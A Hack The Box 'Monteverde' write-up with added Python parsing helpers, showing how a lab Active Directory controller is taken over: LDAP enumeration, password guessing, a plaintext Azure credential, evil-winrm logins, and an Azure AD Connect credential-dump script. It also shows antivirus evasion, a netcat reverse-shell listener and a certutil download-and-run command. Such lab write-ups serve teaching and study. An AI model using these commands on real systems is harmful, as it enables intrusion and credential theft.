htb-monteverde-nl

As always, we start with an nmap scan. Kerberos (88), LDAP (389/3268, domain MEGABANK.LOCAL) and SMB with signing required tell us we are looking at a domain controller:

# Nmap 7.80 scan initiated Mon Jan 13 07:39:41 2020 as: nmap -A -oN fullscan-A 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.081s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-13 12:50:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/13%Time=5E1C651E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 10m42s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-01-13T12:53:03
|_ start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 104.46 ms 10.10.16.1
2 104.61 ms 10.10.10.172

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 13 07:44:56 2020 -- 1 IP address (1 host up) scanned in 315.99 seconds

The LDAP service accepts anonymous (simple, unauthenticated) binds, so a plain ldapsearch dumps the whole MEGABANK.LOCAL naming context. That is where the list of users came from:

root@kali:~/htb/monteverde# ldapsearch -h 10.10.10.172 -p 389 -x -b "dc=MEGABANK,dc=LOCAL" > ldaplogall.txt

The same dump also contains a group named Azure Admins, which already hints that Azure AD Connect is installed on this box:
# Azure Admins, Groups, MEGABANK.LOCAL
dn: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Azure Admins
member: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
member: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
member: CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103001011.0Z
whenChanged: 20200103001032.0Z
uSNCreated: 36889
uSNChanged: 36897
name: Azure Admins
objectGUID:: iCAImwQrNUW6YeEQTXxy+w==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKQoAAA==
sAMAccountName: Azure Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 20200103123551.0Z
dSCorePropagationData: 16010101000001.0Z
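
To turn a raw ldapsearch dump into something usable (account and group names, SIDs, group scope, members) without eyeballing it, here is a small LDIF parser. This is an added example written for this page, not a tool from the original writeup; its only input is the Azure Admins entry shown above, so it runs offline. Notice that the decoded SID shares its domain part with the mhope SID that whoami /all prints further down, and that the group's RID is 2601.

```python
import base64
import struct

# LDIF entry for the "Azure Admins" group, copied from the ldapsearch output
# above (binary attributes such as objectSid come out base64 after a double colon).
SAMPLE_LDIF = """\
# Azure Admins, Groups, MEGABANK.LOCAL
dn: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Azure Admins
member: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
member: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
member: CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKQoAAA==
sAMAccountName: Azure Admins
sAMAccountType: 268435456
groupType: -2147483646

"""

# groupType bit flags and sAMAccountType values as documented by Microsoft.
GROUP_SCOPE = {0x2: "global", 0x4: "domain local", 0x8: "universal"}
SECURITY_ENABLED = 0x80000000
SAM_TYPES = {
    0x10000000: "group",
    0x30000000: "user",
    0x30000001: "computer",
    0x30000002: "trust",
}


def parse_ldif(text):
    """Parse LDIF text into a list of entries (dict: attribute -> list of values).

    Handles '#' comments, folded continuation lines (leading space) and
    '::' base64 values, which are returned as bytes."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:      # continuation of the previous line
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:                  # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        if ":: " in line:
            attr, val = line.split(":: ", 1)
            current.setdefault(attr, []).append(base64.b64decode(val))
        elif ": " in line:
            attr, val = line.split(": ", 1)
            current.setdefault(attr, []).append(val)
    return entries


def decode_sid(blob):
    """Convert a binary objectSid into the familiar S-1-5-21-... string."""
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")          # 48-bit big-endian
    subs = struct.unpack("<%dI" % count, blob[8:8 + 4 * count])  # little-endian
    return "S-%d-%d-" % (revision, authority) + "-".join(str(s) for s in subs)


def describe_group_type(value):
    """Turn groupType (signed 32-bit) into e.g. 'security-enabled global group'."""
    flags = int(value) & 0xFFFFFFFF
    scope = GROUP_SCOPE.get(flags & 0xE, "unknown-scope")
    kind = "security-enabled" if flags & SECURITY_ENABLED else "distribution"
    return "%s %s group" % (kind, scope)


def summarize(entries):
    """Pick out the fields an attacker cares about from each parsed entry."""
    out = []
    for e in entries:
        sid = decode_sid(e["objectSid"][0]) if "objectSid" in e else None
        out.append({
            "name": e.get("sAMAccountName", ["?"])[0],
            "kind": SAM_TYPES.get(int(e.get("sAMAccountType", ["0"])[0]), "other"),
            "sid": sid,
            "rid": int(sid.rsplit("-", 1)[1]) if sid else None,
            "domain_sid": sid.rsplit("-", 1)[0] if sid else None,
            "group_type": describe_group_type(e["groupType"][0]) if "groupType" in e else None,
            # member DNs reduced to their CN for readability
            "members": [m.split(",", 1)[0][3:] for m in e.get("member", [])],
        })
    return out


if __name__ == "__main__":
    for row in summarize(parse_ldif(SAMPLE_LDIF)):
        print(row)
```

Point it at the full ldaplogall.txt instead of SAMPLE_LDIF and every user, group and computer object comes out with its SID and type, which is all you need to build a username list for the username-as-password check that works against SABatchJobs below.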
One of the accounts from the LDAP dump, SABatchJobs, uses its own username as its password. Logging in to SMB as SABatchJobs:SABatchJobs and listing the users$ share turns up an XML file in mhope's home directory:
root@kali:~/htb/monteverde# smbmap -u SABatchJobs -p SABatchJobs -d MEGABANK -H 10.10.10.172
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.172...
[+] IP: 10.10.10.172:445 Name: MEGABANK.local 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
azure_uploads READ ONLY
C$ NO ACCESS
E$ NO ACCESS
IPC$ READ ONLY
NETLOGON READ ONLY
SYSVOL READ ONLY
users$ READ ONLY
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
.        D 0 Fri Jan 3 08:12:48 2020
..       D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope    D 0 Fri Jan 3 08:41:18 2020
roleary  D 0 Fri Jan 3 08:10:30 2020
smorgan  D 0 Fri Jan 3 08:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
.       D 0 Fri Jan 3 08:41:18 2020
..      D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)
smb: \mhope\>
root@kali:~/htb/monteverde# cat azure.xml 
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>

The file is a PowerShell CLIXML export of an Azure AD credential object, and its Password property is stored as a plain string. Because it sits in mhope's directory, a reasonable guess is that this is his password as well: mhope:4n0therD4y@n0th3r$
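
A quick way to triage files like azure.xml (and any other Export-Clixml output you find on shares) is to parse the CLIXML and classify every secret-looking property. This is an added example, not part of the original writeup. The first object is azure.xml as recovered above; the second object, the account name MEGABANK\svc_example and the truncated hex blob in it are constructed to show the other common case, a PSCredential exported with Export-Clixml, whose SecureString is DPAPI-protected and can only be recovered by importing it as the same user on the same host.

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/powershell/2004/04}"

# azure.xml as recovered from the users$ share (copied from above), followed by a
# constructed second object showing what Export-Clixml writes for a PSCredential:
# the SecureString is serialised as a DPAPI blob in hex (<SS>), not as plain text.
# The account name and the (truncated) blob in that second object are made up.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
<Obj RefId="1">
<TN RefId="1">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">MEGABANK\\svc_example</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb</SS>
</Props>
</Obj>
</Objs>
"""

# Property names worth flagging when they show up in an exported object.
SECRET_HINTS = ("password", "secret", "key", "token", "pwd")
# Prefix of every DPAPI blob: version 1 + provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb.
DPAPI_MAGIC = "01000000d08c9ddf0115d1118c7a00c04fc297eb"


def parse_clixml(text):
    """Return a list of {'types': [...], 'props': {name: (tag, value)}} for each <Obj>."""
    root = ET.fromstring(text)
    objects = []
    for obj in root.iter(NS + "Obj"):
        types = [t.text for t in obj.findall("./%sTN/%sT" % (NS, NS))]
        props = {}
        p = obj.find(NS + "Props")
        if p is not None:
            for child in p:
                tag = child.tag[len(NS):]       # S, SS, G, DT, B, I32, Nil, ...
                props[child.get("N")] = (tag, child.text)
        objects.append({"types": types, "props": props})
    return objects


def find_secrets(objects):
    """Flag secret-looking properties and say whether they are usable as-is."""
    hits = []
    for o in objects:
        for name, (tag, value) in o["props"].items():
            if not any(h in name.lower() for h in SECRET_HINTS):
                continue
            if tag == "SS":
                # SecureString: only the user and host that exported it can Import-Clixml it back.
                kind = "dpapi-protected" if (value or "").lower().startswith(DPAPI_MAGIC) else "securestring"
            elif tag == "G" and value == "00000000-0000-0000-0000-000000000000":
                continue                        # an empty GUID carries nothing
            else:
                kind = "plaintext"
            hits.append({"type": o["types"][0] if o["types"] else None,
                         "name": name, "kind": kind, "value": value})
    return hits


if __name__ == "__main__":
    for h in find_secrets(parse_clixml(SAMPLE_CLIXML)):
        print(h)
```

Run it and the two Password properties come back as plaintext (usable directly, as the writeup does with mhope) and dpapi-protected (needs Import-Clixml in the exporting user's context on the original machine).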

With evil-winrm you can connect to the victim and get the user’s flag:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
4961976bd7d8f4eeb2ce3705e2f212f2

Getting root

If you look at the groups of this user, you can see that he is a member of Azure Admins. That group belongs to Azure AD Connect, which keeps the credentials of the on-premises account it syncs with in its ADSync SQL database (encrypted, but with the key material kept on the same host). That sync account is normally granted directory replication (DCSync) rights on the domain, and on this box it turns out to be the domain Administrator itself, so recovering it from the database is the path to root.

Running the attack is as easy as downloading the PS1 script from:

https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1

More background on the technique is in: https://blog.xpnsec.com/azuread-connect-for-redteam/

Next we upload the script and run it. It is uploaded with an .xml extension and renamed on the target, which was enough to get it past the antivirus that blocked it when fetched directly (see the failed attempts at the end):

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /root/htb/monteverde/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\shellcode.xml
Info: Uploading /root/htb/monteverde/Azure-ADConnect.ps1 to c:\windows\system32\spool\drivers\color\shellcode.xml

Data: 3016 bytes of 3016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ren shellcode.xml Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ./Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Import-Module ./Azure-ADConnect.ps1 
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!

With the Administrator password you can log in via WinRM and read the root flag:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u administrator -p 'd0m@in4dminyeah!'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
12909612d25c8dcf6e5a07d1a804a0bc

Some failed attempts along the way, for the record. The first was serving the script from impacket-smbserver without SMB2 support, which Windows refuses because it will not fall back to SMB1 (starting the server with -smb2support fixes that). The second was pulling the script with certutil from a cmd reverse shell running as mhope, where it was blocked by the antivirus, hence the upload-as-.xml trick used above:

root@kali:~/htb/monteverde# impacket-smbserver share ./
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
C:\windows\system32\spool\drivers\color>copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
root@kali:~/htb# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.172] 61971
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32\spool\drivers\color>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID 
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601

--snip--

C:\windows\system32\spool\drivers\color>powershell -nop -Exec Bypass
certutil -urlcache -split -f http://10.10.16.70/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
  This script contains malicious content and has been blocked by your antivirus software.

Author : Puckiestyle
